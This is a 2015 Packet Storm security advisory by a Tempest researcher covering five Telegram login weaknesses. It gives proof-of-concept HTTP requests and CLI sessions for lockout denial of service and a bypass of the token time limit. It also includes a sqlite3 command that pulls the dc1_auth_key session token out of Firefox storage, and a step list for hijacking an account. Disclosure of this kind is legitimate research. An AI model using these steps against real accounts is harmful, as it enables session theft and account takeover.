Telegram Denial Of Service / Bypass Limit

2015-10-02T00:00:00
ID PACKETSTORM:133825
Type packetstorm
Reporter Eduardo Alves
Modified 2015-10-02T00:00:00

Description

                                        
                                            `#[+] Title: Telegram - Multiple Vulnerabilities  
#[+] Product: Telegram  
#[+] Vendor: http://telegram.org/  
#[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org  
#  
# Author : Eduardo Alves  
# E-Mail : edudx1[ at ]gmail[ dot ]com  
# Website : tempest.com.br/en/  
  
  
  
Info:  
As we know, the Telegram access uses by default is possible only with a  
token (5 digits).  
This token could be obtained by: Eavesdropping/desktop  
notifications/SMS/incoming calls...  
  
  
  
###################################################################################  
#[1] my.telegram.org Denial Of Service  
  
The my.telegram.org website behaves inadequately, blocking the users  
access after 5 consecutive incorrect phone number attempts.  
  
  
## PoC:  
---------------------------------------------------------------------------------  
POST /auth/send_password HTTP/1.1  
Host: my.telegram.org  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: https://my.telegram.org/auth  
  
  
phone=%2B55818888888  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[2] Bypass 5 minutes limit to input token  
  
After the web.telegram.org asks for a new token, we have 5 minutes to send  
it.  
So, just use Telegram-CLI and you can bypass this  
  
  
## PoC:  
---------------------------------------------------------------------------------  
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman  
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type  
`show_license'.  
This is free software, and you are welcome to redistribute it  
under certain conditions; type `show_license' for details.  
Telegram-cli uses libtgl version 2.0.3  
Telegram-cli includes software developed by the OpenSSL Project  
for use in the OpenSSL Toolkit. (http://www.openssl.org/)  
Telegram-cli uses libpython version 2.7.6  
I: config dir=[/home/ubuntu/.telegram-cli]  
phone number: +558888888888  
code ('call' for phone call): <----- ex: You can put after 24 hours  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[3] Telegram Denial Of Service in token request  
  
By submitting incorret code attempts, a normal user can't ask for a new  
code for an indetermined period of time.  
  
  
## PoC:  
---------------------------------------------------------------------------------  
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman  
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type  
`show_license'.  
This is free software, and you are welcome to redistribute it  
under certain conditions; type `show_license' for details.  
Telegram-cli uses libtgl version 2.0.3  
Telegram-cli includes software developed by the OpenSSL Project  
for use in the OpenSSL Toolkit. (http://www.openssl.org/)  
Telegram-cli uses libpython version 2.7.6  
I: config dir=[/home/ubuntu/.telegram-cli]  
phone number: +558388888888  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
---------------------------------------------------------------------------------  
Error: In web.telegram.org  
---------------------------------------------------------------------------------  
Method: auth.signIn  
Result:  
{"_":"rpc_error","error_code":420,"error_message":"FLOOD_WAIT_86129"}  
Stack: Error  
at h (https://web.telegram.org/js/app.js:16:26020)  
at https://web.telegram.org/js/app.js:16:27238  
at l (https://web.telegram.org/js/app.js:8:6393)  
at https://web.telegram.org/js/app.js:8:6565  
at u.$eval (https://web.telegram.org/js/app.js:8:13762)  
at u.$digest (https://web.telegram.org/js/app.js:8:12258)  
at https://web.telegram.org/js/app.js:8:13847  
at s (https://web.telegram.org/js/app.js:7:744)  
at https://web.telegram.org/js/app.js:7:2742  
at n (https://web.telegram.org/js/app.js:2:16525)  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[4] User identity validation abscence  
  
In various scenarios web applications require session management and access  
control mechanisms in order to enforce certain actions to be carried out,  
exclusively, by certified/authorized personnel.  
In web.telegram.org, this management control is implemented through Local  
Storage. However, there is a possibility of an attacker — who possesses  
valid dc1_auth_key from the victim — to access the application alongside  
the true user of the given account.  
  
Ex: Firefox  
---------------------------------------------------------------------------------  
sqlite3 -header -separator " " webappsstore.sqlite "select * from  
webappsstore2;" > out.txt; cat out.txt | grep dc1_aut  
gro.margelet.bew.:https:443 dc1_auth_key  
"ccccccccccccc14c18f5b5eab567b23e30a9ffa803027f8ff7c763bb5bbf9bd9908ac5ff53c718b1c8d7b7f9b040956184ca7748cfdaed5eeec071cdbc18cb06151b83ad8edd8febf2c6832b875627e1467c8dd4c612cda4df63cdf95129c960e6521806e12debc3b96846acf668b74c32f3f1f8ad820a60de836316523549cccccccccccccccccc9ec6ec38fd619752d1ed145427dd7600af2312ab493ebebadf6b1effb6e11764887d5c8a679cc371797f92d284dc54c35fb578c41ca61222d7781485cccccccccccccccccccccccca96a97f8dced0a793c80cbd4ed064bb95ea63e69ed912ccf94c53f7563cb27346ccccccccccccccccccc6fd0492db  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[5] Hijacking account and importing contacts  
  
If the victim uses only the passcode as two-step verification, we can reset  
her account, and as a result, the attacker creates the possibility for  
importing contacts and hijacking the account:  
  
  
- Attacker asks for token using Telegram-Web  
- Obtains the code  
- Resets account  
- Waits for the victim to log-in  
- Imports contacts (auto)  
- Kills the victim's session  
- Enables Two-Step verification (passcode + email)  
  
  
  
Thanks to:  
  
Leandro Oliveira  
Joaquim Brasil  
Marcelo Pessoa  
Toronto Garcez  
Tiago Barbosa  
  
From Tempest Security Intelligence  
  
  
`